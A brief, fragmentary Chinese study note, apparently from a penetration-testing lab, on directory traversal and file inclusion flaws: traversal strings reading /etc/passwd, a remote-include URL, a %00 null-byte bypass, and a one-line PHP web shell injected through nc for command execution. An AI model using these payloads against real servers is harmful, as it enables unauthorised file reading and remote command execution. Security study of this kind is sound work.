web目标遍历和文件包含漏洞
配置靶机:
→
重启apache服务:
经典测试方法:
•?file=../../../../etc/passwd
•?page=file:///etc/passwd
•?home=main.cgi
•?page=http://www.a.com/1.php
•http://1.1.1.1/../../../../dir/file.txt
绕过过滤检测方法
部分服务器防御机制:在路径后面添加.php
**方法:
1.在路径后添加%00,如:../../../../etc/password%00
原理:服务器会自动忽略%00后面的内容
2.编码:
代码利用:
通过nc目标机器的80端口,注入代码
<?php echoshell_exec($_GET['cmd']);?>
如果www-data有权限访问,则可以执行攻击代码。
对http://一次性过滤的攻击方法:
漏洞危害:
有很多攻击字典,可配合burp的intruder模块使用